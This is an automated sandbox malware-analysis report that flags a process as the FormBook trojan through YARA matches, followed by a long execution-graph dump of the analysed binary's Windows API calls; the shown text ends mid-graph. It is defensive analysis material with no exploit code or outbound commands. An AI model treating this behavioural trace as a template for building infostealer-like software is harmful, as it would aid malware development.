                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:06:51:32
                                                                                                                                            Start date:10/10/2024
                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                                            File size:676'768 bytes
                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0.5%
                                                                                                                                              Signature Coverage:9.6%
                                                                                                                                              Total number of Nodes:2000
                                                                                                                                              Total number of Limit Nodes:35
                                                                                                                                              execution_graph 86294 4010e0 86297 401100 86294->86297 86296 4010f8 86298 401113 86297->86298 86299 401184 86298->86299 86300 40114c 86298->86300 86302 401120 86298->86302 86329 401182 86298->86329 86335 401250 86299->86335 86303 401151 86300->86303 86304 40119d 86300->86304 86301 40112c DefWindowProcW 86301->86296 86302->86301 86356 401000 Shell_NotifyIconW __call_reportfault 86302->86356 86306 401219 86303->86306 86307 40115d 86303->86307 86309 4011a3 86304->86309 86310 42afb4 86304->86310 86306->86302 86313 401225 86306->86313 86311 401163 86307->86311 86312 42b01d 86307->86312 86308 401193 86308->86296 86309->86302 86319 4011b6 KillTimer 86309->86319 86320 4011db SetTimer RegisterWindowMessageW 86309->86320 86351 40f190 10 API calls 86310->86351 86316 42afe9 86311->86316 86317 40116c 86311->86317 86312->86301 86355 4370f4 52 API calls 86312->86355 86367 468b0e 74 API calls __call_reportfault 86313->86367 86353 40f190 10 API calls 86316->86353 86317->86302 86324 401174 86317->86324 86318 42b04f 86357 40e0c0 86318->86357 86350 401000 Shell_NotifyIconW __call_reportfault 86319->86350 86320->86308 86322 401204 CreatePopupMenu 86320->86322 86322->86296 86352 45fd57 65 API calls __call_reportfault 86324->86352 86328 4011c9 PostQuitMessage 86328->86296 86329->86301 86330 42afe4 86330->86308 86331 42b00e 86354 401a50 329 API calls 86331->86354 86334 42afdc 86334->86301 86334->86330 86336 4012e8 86335->86336 86337 401262 __call_reportfault 86335->86337 86336->86308 86368 401b80 86337->86368 86339 40128c 86340 4012d1 KillTimer SetTimer 86339->86340 86341 4012bb 86339->86341 86342 4272ec 86339->86342 86340->86336 86345 4012c5 86341->86345 86346 42733f 86341->86346 86343 4272f4 Shell_NotifyIconW 86342->86343 86344 42731a Shell_NotifyIconW 86342->86344 86343->86340 86344->86340 86345->86340 86349 427393 Shell_NotifyIconW 86345->86349 86347 427348 Shell_NotifyIconW 86346->86347 86348 42736e Shell_NotifyIconW 86346->86348 86347->86340 86348->86340 86349->86340 86350->86328 86351->86308 86352->86334 86353->86331 86354->86329 86355->86329 86356->86318 86359 40e0e7 __call_reportfault 86357->86359 86358 40e142 86361 40e184 86358->86361 86466 4341e6 63 API calls __wcsicoll 86358->86466 86359->86358 86360 42729f DestroyIcon 86359->86360 86360->86358 86363 40e1a0 Shell_NotifyIconW 86361->86363 86364 4272db Shell_NotifyIconW 86361->86364 86365 401b80 54 API calls 86363->86365 86366 40e1ba 86365->86366 86366->86329 86367->86330 86369 401b9c 86368->86369 86389 401c7e 86368->86389 86390 4013c0 86369->86390 86372 42722b LoadStringW 86375 427246 86372->86375 86373 401bb9 86395 402160 86373->86395 86409 40e0a0 86375->86409 86376 401bcd 86378 427258 86376->86378 86379 401bda 86376->86379 86413 40d200 52 API calls 2 library calls 86378->86413 86379->86375 86380 401be4 86379->86380 86408 40d200 52 API calls 2 library calls 86380->86408 86383 427267 86384 42727b 86383->86384 86386 401bf3 _wcscpy __call_reportfault _wcsncpy 86383->86386 86414 40d200 52 API calls 2 library calls 86384->86414 86387 401c62 Shell_NotifyIconW 86386->86387 86387->86389 86388 427289 86389->86339 86415 4115d7 86390->86415 86396 426daa 86395->86396 86397 40216b _wcslen 86395->86397 86453 40c600 86396->86453 86400 402180 86397->86400 86401 40219e 86397->86401 86399 426db5 86399->86376 86452 403bd0 52 API calls moneypunct 86400->86452 86403 4013a0 52 API calls 86401->86403 86405 4021a5 86403->86405 86404 402187 _memmove 86404->86376 86406 426db7 86405->86406 86407 4115d7 52 API calls 86405->86407 86407->86404 86408->86386 86410 40e0b2 86409->86410 86411 40e0a8 86409->86411 86410->86386 86465 403c30 52 API calls _memmove 86411->86465 86413->86383 86414->86388 86417 4115e1 _malloc 86415->86417 86418 4013e4 86417->86418 86422 4115fd std::exception::exception 86417->86422 86429 4135bb 86417->86429 86426 4013a0 86418->86426 86419 41163b 86444 4180af 46 API calls std::exception::operator= 86419->86444 86421 411645 86445 418105 RaiseException 86421->86445 86422->86419 86443 41130a 51 API calls __cinit 86422->86443 86425 411656 86427 4115d7 52 API calls 86426->86427 86428 4013a7 86427->86428 86428->86372 86428->86373 86430 413638 _malloc 86429->86430 86439 4135c9 _malloc 86429->86439 86451 417f77 46 API calls __getptd_noexit 86430->86451 86431 4135d4 86431->86439 86446 418901 46 API calls 2 library calls 86431->86446 86447 418752 46 API calls 9 library calls 86431->86447 86448 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86431->86448 86434 4135f7 RtlAllocateHeap 86434->86439 86442 413630 86434->86442 86436 413624 86449 417f77 46 API calls __getptd_noexit 86436->86449 86439->86431 86439->86434 86439->86436 86440 413622 86439->86440 86450 417f77 46 API calls __getptd_noexit 86440->86450 86442->86417 86443->86419 86444->86421 86445->86425 86446->86431 86447->86431 86449->86440 86450->86442 86451->86442 86452->86404 86454 40c619 86453->86454 86455 40c60a 86453->86455 86454->86399 86455->86454 86458 4026f0 86455->86458 86457 426d7a _memmove 86457->86399 86459 426873 86458->86459 86460 4026ff 86458->86460 86461 4013a0 52 API calls 86459->86461 86460->86457 86462 42687b 86461->86462 86463 4115d7 52 API calls 86462->86463 86464 42689e _memmove 86463->86464 86464->86457 86465->86410 86466->86361 86467 40bd20 86468 428194 86467->86468 86469 40bd2d 86467->86469 86470 40bd43 86468->86470 86472 4281bc 86468->86472 86475 4281b2 86468->86475 86477 40bd37 86469->86477 86490 4531b1 85 API calls 5 library calls 86469->86490 86489 45e987 86 API calls moneypunct 86472->86489 86488 40b510 VariantClear 86475->86488 86479 40bd50 86477->86479 86478 4281ba 86480 426cf1 86479->86480 86481 40bd63 86479->86481 86500 44cde9 52 API calls _memmove 86480->86500 86491 40bd80 86481->86491 86484 40bd73 86484->86470 86485 426cfc 86486 40e0a0 52 API calls 86485->86486 86487 426d02 86486->86487 86488->86478 86489->86469 86490->86477 86492 40bd8e 86491->86492 86493 40bdb7 _memmove 86491->86493 86492->86493 86494 40bded 86492->86494 86495 40bdad 86492->86495 86493->86484 86496 4115d7 52 API calls 86494->86496 86501 402f00 86495->86501 86498 40bdf6 86496->86498 86498->86493 86499 4115d7 52 API calls 86498->86499 86499->86493 86500->86485 86502 402f10 86501->86502 86503 402f0c 86501->86503 86504 4115d7 52 API calls 86502->86504 86505 4268c3 86502->86505 86503->86493 86506 402f51 moneypunct _memmove 86504->86506 86506->86493 86507 425ba2 86512 40e360 86507->86512 86509 425bb4 86528 41130a 51 API calls __cinit 86509->86528 86511 425bbe 86513 4115d7 52 API calls 86512->86513 86514 40e3ec GetModuleFileNameW 86513->86514 86529 413a0e 86514->86529 86516 40e421 _wcsncat 86532 413a9e 86516->86532 86519 4115d7 52 API calls 86520 40e45e _wcscpy 86519->86520 86535 40bc70 86520->86535 86524 40e4a9 86524->86509 86525 40e4a1 _wcscat _wcslen _wcsncpy 86525->86524 86526 4115d7 52 API calls 86525->86526 86527 401c90 52 API calls 86525->86527 86526->86525 86527->86525 86528->86511 86554 413801 86529->86554 86584 419efd 86532->86584 86536 4115d7 52 API calls 86535->86536 86537 40bc98 86536->86537 86538 4115d7 52 API calls 86537->86538 86539 40bca6 86538->86539 86540 40e4c0 86539->86540 86596 403350 86540->86596 86542 40e4cb RegOpenKeyExW 86543 427190 RegQueryValueExW 86542->86543 86544 40e4eb 86542->86544 86545 4271b0 86543->86545 86546 42721a RegCloseKey 86543->86546 86544->86525 86547 4115d7 52 API calls 86545->86547 86546->86525 86548 4271cb 86547->86548 86603 43652f 52 API calls 86548->86603 86550 4271d8 RegQueryValueExW 86551 42720e 86550->86551 86552 4271f7 86550->86552 86551->86546 86553 402160 52 API calls 86552->86553 86553->86551 86556 41389e 86554->86556 86557 41381a 86554->86557 86555 4139e8 86581 417f77 46 API calls __getptd_noexit 86555->86581 86556->86555 86559 413a00 86556->86559 86557->86556 86568 41388a 86557->86568 86576 419e30 46 API calls 2 library calls 86557->86576 86583 417f77 46 API calls __getptd_noexit 86559->86583 86560 4139ed 86582 417f25 10 API calls __localtime64_s 86560->86582 86563 413967 86563->86516 86565 41396c 86565->86556 86565->86563 86569 41397a 86565->86569 86566 413929 86566->86556 86567 413945 86566->86567 86578 419e30 46 API calls 2 library calls 86566->86578 86567->86556 86567->86563 86572 41395b 86567->86572 86568->86556 86575 413909 86568->86575 86577 419e30 46 API calls 2 library calls 86568->86577 86580 419e30 46 API calls 2 library calls 86569->86580 86579 419e30 46 API calls 2 library calls 86572->86579 86575->86565 86575->86566 86576->86568 86577->86575 86578->86567 86579->86563 86580->86563 86581->86560 86582->86563 86583->86563 86585 419f13 86584->86585 86586 419f0e 86584->86586 86593 417f77 46 API calls __getptd_noexit 86585->86593 86586->86585 86592 419f2b 86586->86592 86588 419f18 86594 417f25 10 API calls __localtime64_s 86588->86594 86591 40e454 86591->86519 86592->86591 86595 417f77 46 API calls __getptd_noexit 86592->86595 86593->86588 86594->86591 86595->86588 86597 403367 86596->86597 86598 403358 86596->86598 86599 4115d7 52 API calls 86597->86599 86598->86542 86600 403370 86599->86600 86601 4115d7 52 API calls 86600->86601 86602 40339e 86601->86602 86602->86542 86603->86550 86604 40393e0 86618 4037030 86604->86618 86606 40394ac 86622 40392d0 86606->86622 86619 4037033 86618->86619 86625 403a4d0 GetPEB 86619->86625 86621 40376bb 86621->86606 86623 40392d9 Sleep 86622->86623 86624 40392e7 86623->86624 86626 403a4fa 86625->86626 86626->86621 86627 416454 86664 416c70 86627->86664 86629 416460 GetStartupInfoW 86630 416474 86629->86630 86665 419d5a HeapCreate 86630->86665 86632 4164cd 86633 4164d8 86632->86633 86748 41642b 46 API calls 3 library calls 86632->86748 86666 417c20 GetModuleHandleW 86633->86666 86636 4164de 86637 4164e9 __RTC_Initialize 86636->86637 86749 41642b 46 API calls 3 library calls 86636->86749 86685 41aaa1 GetStartupInfoW 86637->86685 86641 416503 GetCommandLineW 86698 41f584 GetEnvironmentStringsW 86641->86698 86645 416513 86704 41f4d6 GetModuleFileNameW 86645->86704 86647 41651d 86648 416528 86647->86648 86751 411924 46 API calls 3 library calls 86647->86751 86708 41f2a4 86648->86708 86651 41652e 86652 416539 86651->86652 86752 411924 46 API calls 3 library calls 86651->86752 86722 411703 86652->86722 86655 416541 86657 41654c __wwincmdln 86655->86657 86753 411924 46 API calls 3 library calls 86655->86753 86726 40d6b0 86657->86726 86660 41657c 86755 411906 46 API calls _doexit 86660->86755 86663 416581 _fseek 86664->86629 86665->86632 86667 417c34 86666->86667 86668 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86666->86668 86756 4178ff 49 API calls _free 86667->86756 86670 417c87 TlsAlloc 86668->86670 86673 417cd5 TlsSetValue 86670->86673 86674 417d96 86670->86674 86671 417c39 86671->86636 86673->86674 86675 417ce6 __init_pointers 86673->86675 86674->86636 86757 418151 InitializeCriticalSectionAndSpinCount 86675->86757 86677 417d91 86765 4178ff 49 API calls _free 86677->86765 86679 417d2a 86679->86677 86758 416b49 86679->86758 86682 417d76 86764 41793c 46 API calls 4 library calls 86682->86764 86684 417d7e GetCurrentThreadId 86684->86674 86686 416b49 __calloc_crt 46 API calls 86685->86686 86693 41aabf 86686->86693 86687 4164f7 86687->86641 86750 411924 46 API calls 3 library calls 86687->86750 86688 41ac6a GetStdHandle 86694 41ac34 86688->86694 86689 41acce SetHandleCount 86689->86687 86690 416b49 __calloc_crt 46 API calls 86690->86693 86691 41ac7c GetFileType 86691->86694 86692 41abb4 86692->86694 86695 41abe0 GetFileType 86692->86695 86696 41abeb InitializeCriticalSectionAndSpinCount 86692->86696 86693->86687 86693->86690 86693->86692 86693->86694 86694->86688 86694->86689 86694->86691 86697 41aca2 InitializeCriticalSectionAndSpinCount 86694->86697 86695->86692 86695->86696 86696->86687 86696->86692 86697->86687 86697->86694 86699 41f595 86698->86699 86700 41f599 86698->86700 86699->86645 86775 416b04 86700->86775 86702 41f5bb _memmove 86703 41f5c2 FreeEnvironmentStringsW 86702->86703 86703->86645 86705 41f50b _wparse_cmdline 86704->86705 86706 416b04 __malloc_crt 46 API calls 86705->86706 86707 41f54e _wparse_cmdline 86705->86707 86706->86707 86707->86647 86709 41f2bc _wcslen 86708->86709 86713 41f2b4 86708->86713 86710 416b49 __calloc_crt 46 API calls 86709->86710 86715 41f2e0 _wcslen 86710->86715 86711 41f336 86782 413748 86711->86782 86713->86651 86714 416b49 __calloc_crt 46 API calls 86714->86715 86715->86711 86715->86713 86715->86714 86716 41f35c 86715->86716 86719 41f373 86715->86719 86781 41ef12 46 API calls 2 library calls 86715->86781 86717 413748 _free 46 API calls 86716->86717 86717->86713 86788 417ed3 86719->86788 86721 41f37f 86721->86651 86723 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86722->86723 86725 411750 __IsNonwritableInCurrentImage 86723->86725 86807 41130a 51 API calls __cinit 86723->86807 86725->86655 86727 42e2f3 86726->86727 86728 40d6cc 86726->86728 86808 408f40 86728->86808 86730 40d707 86812 40ebb0 86730->86812 86733 40d737 86815 411951 86733->86815 86738 40d751 86827 40f4e0 SystemParametersInfoW SystemParametersInfoW 86738->86827 86740 40d75f 86828 40d590 GetCurrentDirectoryW 86740->86828 86742 40d767 SystemParametersInfoW 86743 40d78d 86742->86743 86744 408f40 VariantClear 86743->86744 86745 40d79d 86744->86745 86746 408f40 VariantClear 86745->86746 86747 40d7a6 86746->86747 86747->86660 86754 4118da 46 API calls _doexit 86747->86754 86748->86633 86749->86637 86754->86660 86755->86663 86756->86671 86757->86679 86760 416b52 86758->86760 86761 416b8f 86760->86761 86762 416b70 Sleep 86760->86762 86766 41f677 86760->86766 86761->86677 86761->86682 86763 416b85 86762->86763 86763->86760 86763->86761 86764->86684 86765->86674 86767 41f683 86766->86767 86768 41f69e _malloc 86766->86768 86767->86768 86769 41f68f 86767->86769 86771 41f6b1 HeapAlloc 86768->86771 86773 41f6d8 86768->86773 86774 417f77 46 API calls __getptd_noexit 86769->86774 86771->86768 86771->86773 86772 41f694 86772->86760 86773->86760 86774->86772 86776 416b0d 86775->86776 86777 4135bb _malloc 45 API calls 86776->86777 86778 416b43 86776->86778 86779 416b24 Sleep 86776->86779 86777->86776 86778->86702 86780 416b39 86779->86780 86780->86776 86780->86778 86781->86715 86783 413753 RtlFreeHeap 86782->86783 86787 41377c _free 86782->86787 86784 413768 86783->86784 86783->86787 86791 417f77 46 API calls __getptd_noexit 86784->86791 86786 41376e GetLastError 86786->86787 86787->86713 86792 417daa 86788->86792 86791->86786 86793 417dc9 __call_reportfault 86792->86793 86794 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86793->86794 86795 417eb5 __call_reportfault 86794->86795 86798 41a208 86795->86798 86797 417ed1 GetCurrentProcess TerminateProcess 86797->86721 86799 41a210 86798->86799 86800 41a212 IsDebuggerPresent 86798->86800 86799->86797 86806 41fe19 86800->86806 86803 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86804 421ff0 __call_reportfault 86803->86804 86805 421ff8 GetCurrentProcess TerminateProcess 86803->86805 86804->86805 86805->86797 86806->86803 86807->86725 86809 408f48 moneypunct 86808->86809 86810 4265c7 VariantClear 86809->86810 86811 408f55 moneypunct 86809->86811 86810->86811 86811->86730 86868 40ebd0 86812->86868 86872 4182cb 86815->86872 86817 41195e 86879 4181f2 LeaveCriticalSection 86817->86879 86819 40d748 86820 4119b0 86819->86820 86821 4119d6 86820->86821 86822 4119bc 86820->86822 86821->86738 86822->86821 86914 417f77 46 API calls __getptd_noexit 86822->86914 86824 4119c6 86915 417f25 10 API calls __localtime64_s 86824->86915 86826 4119d1 86826->86738 86827->86740 86916 401f20 86828->86916 86830 40d5b6 IsDebuggerPresent 86831 40d5c4 86830->86831 86832 42e1bb MessageBoxA 86830->86832 86833 42e1d4 86831->86833 86834 40d5e3 86831->86834 86832->86833 87088 403a50 52 API calls 3 library calls 86833->87088 86986 40f520 86834->86986 86838 40d5fd GetFullPathNameW 86998 401460 86838->86998 86840 40d63b 86841 40d643 86840->86841 86842 42e231 SetCurrentDirectoryW 86840->86842 86843 40d64c 86841->86843 87089 432fee 6 API calls 86841->87089 86842->86841 87013 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86843->87013 86846 42e252 86846->86843 86848 42e25a GetModuleFileNameW 86846->86848 86850 42e274 86848->86850 86851 42e2cb GetForegroundWindow ShellExecuteW 86848->86851 87090 401b10 86850->87090 86853 40d688 86851->86853 86852 40d656 86855 40d669 86852->86855 86857 40e0c0 74 API calls 86852->86857 86860 40d692 SetCurrentDirectoryW 86853->86860 87021 4091e0 86855->87021 86857->86855 86860->86742 86862 42e28d 87097 40d200 52 API calls 2 library calls 86862->87097 86865 42e299 GetForegroundWindow ShellExecuteW 86866 42e2c6 86865->86866 86866->86853 86867 40ec00 LoadLibraryA GetProcAddress 86867->86733 86869 40d72e 86868->86869 86870 40ebd6 LoadLibraryA 86868->86870 86869->86733 86869->86867 86870->86869 86871 40ebe7 GetProcAddress 86870->86871 86871->86869 86873 4182e0 86872->86873 86874 4182f3 EnterCriticalSection 86872->86874 86880 418209 86873->86880 86874->86817 86876 4182e6 86876->86874 86907 411924 46 API calls 3 library calls 86876->86907 86879->86819 86881 418215 _fseek 86880->86881 86882 418225 86881->86882 86883 41823d 86881->86883 86908 418901 46 API calls 2 library calls 86882->86908 86885 416b04 __malloc_crt 45 API calls 86883->86885 86891 41824b _fseek 86883->86891 86887 418256 86885->86887 86886 41822a 86909 418752 46 API calls 9 library calls 86886->86909 86889 41825d 86887->86889 86890 41826c 86887->86890 86911 417f77 46 API calls __getptd_noexit 86889->86911 86894 4182cb __lock 45 API calls 86890->86894 86891->86876 86892 418231 86910 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86892->86910 86896 418273 86894->86896 86898 4182a6 86896->86898 86899 41827b InitializeCriticalSectionAndSpinCount 86896->86899 86900 413748 _free 45 API calls 86898->86900 86901 418297 86899->86901 86902 41828b 86899->86902 86900->86901 86913 4182c2 LeaveCriticalSection _doexit 86901->86913 86903 413748 _free 45 API calls 86902->86903 86905 418291 86903->86905 86912 417f77 46 API calls __getptd_noexit 86905->86912 86908->86886 86909->86892 86911->86891 86912->86901 86913->86891 86914->86824 86915->86826 87098 40e6e0 86916->87098 86920 401f41 GetModuleFileNameW 87116 410100 86920->87116 86922 401f5c 87128 410960 86922->87128 86925 401b10 52 API calls 86926 401f81 86925->86926 87131 401980 86926->87131 86928 401f8e 86929 408f40 VariantClear 86928->86929 86930 401f9d 86929->86930 86931 401b10 52 API calls 86930->86931 86932 401fb4 86931->86932 86933 401980 53 API calls 86932->86933 86934 401fc3 86933->86934 86935 401b10 52 API calls 86934->86935 86936 401fd2 86935->86936 87139 40c2c0 86936->87139 86938 401fe1 86939 40bc70 52 API calls 86938->86939 86940 401ff3 86939->86940 87157 401a10 86940->87157 86942 401ffe 87164 4114ab 86942->87164 86945 428b05 86947 401a10 52 API calls 86945->86947 86946 402017 86948 4114ab __wcsicoll 58 API calls 86946->86948 86949 428b18 86947->86949 86950 402022 86948->86950 86952 401a10 52 API calls 86949->86952 86950->86949 86951 40202d 86950->86951 86953 4114ab __wcsicoll 58 API calls 86951->86953 86954 428b33 86952->86954 86955 402038 86953->86955 86957 428b3b GetModuleFileNameW 86954->86957 86956 402043 86955->86956 86955->86957 86958 4114ab __wcsicoll 58 API calls 86956->86958 86959 401a10 52 API calls 86957->86959 86960 40204e 86958->86960 86961 428b6c 86959->86961 86962 402092 86960->86962 86966 401a10 52 API calls 86960->86966 86971 428b90 _wcscpy 86960->86971 86963 40e0a0 52 API calls 86961->86963 86965 4020a3 86962->86965 86962->86971 86964 428b7a 86963->86964 86967 401a10 52 API calls 86964->86967 86968 428bc6 86965->86968 87172 40e830 53 API calls 86965->87172 86969 402073 _wcscpy 86966->86969 86970 428b88 86967->86970 86976 401a10 52 API calls 86969->86976 86970->86971 86973 401a10 52 API calls 86971->86973 86981 4020d0 86973->86981 86974 4020bb 87173 40cf00 53 API calls 86974->87173 86976->86962 86977 4020c6 86978 408f40 VariantClear 86977->86978 86978->86981 86980 402110 86983 408f40 VariantClear 86980->86983 86981->86980 86984 401a10 52 API calls 86981->86984 87174 40cf00 53 API calls 86981->87174 87175 40e6a0 53 API calls 86981->87175 86985 402120 moneypunct 86983->86985 86984->86981 86985->86830 86987 4295c9 __call_reportfault 86986->86987 86988 40f53c 86986->86988 86990 4295d9 GetOpenFileNameW 86987->86990 87855 410120 86988->87855 86990->86988 86992 40d5f5 86990->86992 86991 40f545 87859 4102b0 SHGetMalloc 86991->87859 86992->86838 86992->86840 86994 40f54c 87864 410190 GetFullPathNameW 86994->87864 86996 40f559 87875 40f570 86996->87875 87931 402400 86998->87931 87000 40146f 87003 428c29 _wcscat 87000->87003 87940 401500 87000->87940 87002 40147c 87002->87003 87948 40d440 87002->87948 87005 401489 87005->87003 87006 401491 GetFullPathNameW 87005->87006 87007 402160 52 API calls 87006->87007 87008 4014bb 87007->87008 87009 402160 52 API calls 87008->87009 87010 4014c8 87009->87010 87010->87003 87011 402160 52 API calls 87010->87011 87012 4014ee 87011->87012 87012->86840 87014 428361 87013->87014 87015 4103fc LoadImageW RegisterClassExW 87013->87015 87968 44395e EnumResourceNamesW LoadImageW 87014->87968 87967 410490 7 API calls 87015->87967 87018 428368 87019 40d651 87020 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87019->87020 87020->86852 87022 409202 87021->87022 87023 42d7ad 87021->87023 87081 409216 moneypunct 87022->87081 88240 410940 329 API calls 87022->88240 88243 45e737 90 API calls 3 library calls 87023->88243 87026 409386 87027 40939c 87026->87027 88241 40f190 10 API calls 87026->88241 87027->86853 87087 401000 Shell_NotifyIconW __call_reportfault 87027->87087 87029 4095b2 87029->87027 87031 4095bf 87029->87031 87030 409253 PeekMessageW 87030->87081 88242 401a50 329 API calls 87031->88242 87033 40d410 VariantClear 87033->87081 87034 42d8cd Sleep 87034->87081 87035 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87035->87027 87038 4095f9 87035->87038 87037 42e13b 88261 40d410 VariantClear 87037->88261 87041 42e158 TranslateMessage DispatchMessageW GetMessageW 87038->87041 87041->87041 87042 42e188 87041->87042 87042->87027 87044 409567 PeekMessageW 87044->87081 87046 44c29d 52 API calls 87086 4094e0 87046->87086 87047 46f3c1 107 API calls 87047->87081 87048 40e0a0 52 API calls 87048->87081 87049 46fdbf 108 API calls 87049->87086 87050 42dcd2 WaitForSingleObject 87055 42dcf0 GetExitCodeProcess CloseHandle 87050->87055 87050->87081 87051 409551 TranslateMessage DispatchMessageW 87051->87044 87053 42dd3d Sleep 87053->87086 87054 47d33e 307 API calls 87054->87081 88250 40d410 VariantClear 87055->88250 87058 4094cf Sleep 87058->87086 87059 40c620 timeGetTime 87059->87086 87062 42d94d timeGetTime 88246 465124 53 API calls 87062->88246 87066 465124 53 API calls 87066->87086 87067 42dd89 CloseHandle 87067->87086 87068 408f40 VariantClear 87068->87086 87070 42de19 GetExitCodeProcess CloseHandle 87070->87086 87073 42de88 Sleep 87073->87081 87076 45e737 90 API calls 87076->87081 87079 42e0cc VariantClear 87079->87081 87080 408f40 VariantClear 87080->87081 87081->87026 87081->87030 87081->87033 87081->87034 87081->87037 87081->87044 87081->87047 87081->87048 87081->87050 87081->87051 87081->87053 87081->87054 87081->87058 87081->87062 87081->87076 87081->87079 87081->87080 87081->87086 87969 4091b0 87081->87969 88027 40afa0 87081->88027 88053 408fc0 87081->88053 88088 408cc0 87081->88088 88102 40d150 87081->88102 88107 40d170 87081->88107 88113 4096a0 87081->88113 88244 465124 53 API calls 87081->88244 88245 40c620 timeGetTime 87081->88245 88260 40e270 VariantClear moneypunct 87081->88260 87082 401b10 52 API calls 87082->87086 87084 401980 53 API calls 87084->87086 87086->87046 87086->87049 87086->87059 87086->87066 87086->87067 87086->87068 87086->87070 87086->87073 87086->87081 87086->87082 87086->87084 88247 45178a 54 API calls 87086->88247 88248 47d33e 329 API calls 87086->88248 88249 453bc6 54 API calls 87086->88249 88251 40d410 VariantClear 87086->88251 88252 443d19 67 API calls _wcslen 87086->88252 88253 4574b4 VariantClear 87086->88253 88254 403cd0 87086->88254 88258 4731e1 VariantClear 87086->88258 88259 4331a2 6 API calls 87086->88259 87087->86853 87088->86840 87089->86846 87091 401b16 _wcslen 87090->87091 87092 4115d7 52 API calls 87091->87092 87095 401b63 87091->87095 87093 401b4b _memmove 87092->87093 87094 4115d7 52 API calls 87093->87094 87094->87095 87096 40d200 52 API calls 2 library calls 87095->87096 87096->86862 87097->86865 87099 40bc70 52 API calls 87098->87099 87100 401f31 87099->87100 87101 402560 87100->87101 87102 40256d __write_nolock 87101->87102 87103 402160 52 API calls 87102->87103 87105 402593 87103->87105 87114 4025bd 87105->87114 87176 401c90 87105->87176 87106 4026f0 52 API calls 87106->87114 87107 4026a7 87108 401b10 52 API calls 87107->87108 87113 4026db 87107->87113 87110 4026d1 87108->87110 87109 401b10 52 API calls 87109->87114 87180 40d7c0 52 API calls 2 library calls 87110->87180 87113->86920 87114->87106 87114->87107 87114->87109 87115 401c90 52 API calls 87114->87115 87179 40d7c0 52 API calls 2 library calls 87114->87179 87115->87114 87181 40f760 87116->87181 87119 410118 87119->86922 87121 42805d 87122 42806a 87121->87122 87237 431e58 87121->87237 87124 413748 _free 46 API calls 87122->87124 87125 428078 87124->87125 87126 431e58 82 API calls 87125->87126 87127 428084 87126->87127 87127->86922 87129 4115d7 52 API calls 87128->87129 87130 401f74 87129->87130 87130->86925 87132 4019a3 87131->87132 87136 401985 87131->87136 87133 4019b8 87132->87133 87132->87136 87844 403e10 53 API calls 87133->87844 87135 40199f 87135->86928 87136->87135 87843 403e10 53 API calls 87136->87843 87138 4019c4 87138->86928 87140 40c2c7 87139->87140 87141 40c30e 87139->87141 87144 40c2d3 87140->87144 87145 426c79 87140->87145 87142 40c315 87141->87142 87143 426c2b 87141->87143 87146 40c321 87142->87146 87147 426c5a 87142->87147 87149 426c4b 87143->87149 87150 426c2e 87143->87150 87845 403ea0 52 API calls __cinit 87144->87845 87850 4534e3 52 API calls 87145->87850 87846 403ea0 52 API calls __cinit 87146->87846 87849 4534e3 52 API calls 87147->87849 87848 4534e3 52 API calls 87149->87848 87153 40c2de 87150->87153 87847 4534e3 52 API calls 87150->87847 87153->86938 87158 401a30 87157->87158 87159 401a17 87157->87159 87161 402160 52 API calls 87158->87161 87160 401a2d 87159->87160 87851 403c30 52 API calls _memmove 87159->87851 87160->86942 87163 401a3d 87161->87163 87163->86942 87165 411523 87164->87165 87166 4114ba 87164->87166 87854 4113a8 58 API calls 4 library calls 87165->87854 87171 40200c 87166->87171 87852 417f77 46 API calls __getptd_noexit 87166->87852 87169 4114c6 87853 417f25 10 API calls __localtime64_s 87169->87853 87171->86945 87171->86946 87172->86974 87173->86977 87174->86981 87175->86981 87177 4026f0 52 API calls 87176->87177 87178 401c97 87177->87178 87178->87105 87179->87114 87180->87113 87241 40f6f0 87181->87241 87183 40f77b _strcat moneypunct 87249 40f850 87183->87249 87188 427c2a 87279 414d04 87188->87279 87190 40f7fc 87190->87188 87191 40f804 87190->87191 87266 414a46 87191->87266 87195 40f80e 87195->87119 87200 4528bd 87195->87200 87197 427c59 87285 414fe2 87197->87285 87199 427c79 87201 4150d1 _fseek 81 API calls 87200->87201 87202 452930 87201->87202 87785 452719 87202->87785 87205 452948 87205->87121 87206 414d04 __fread_nolock 61 API calls 87207 452966 87206->87207 87208 414d04 __fread_nolock 61 API calls 87207->87208 87209 452976 87208->87209 87210 414d04 __fread_nolock 61 API calls 87209->87210 87211 45298f 87210->87211 87212 414d04 __fread_nolock 61 API calls 87211->87212 87213 4529aa 87212->87213 87214 4150d1 _fseek 81 API calls 87213->87214 87215 4529c4 87214->87215 87216 4135bb _malloc 46 API calls 87215->87216 87217 4529cf 87216->87217 87218 4135bb _malloc 46 API calls 87217->87218 87219 4529db 87218->87219 87220 414d04 __fread_nolock 61 API calls 87219->87220 87221 4529ec 87220->87221 87222 44afef GetSystemTimeAsFileTime 87221->87222 87223 452a00 87222->87223 87224 452a36 87223->87224 87225 452a13 87223->87225 87227 452aa5 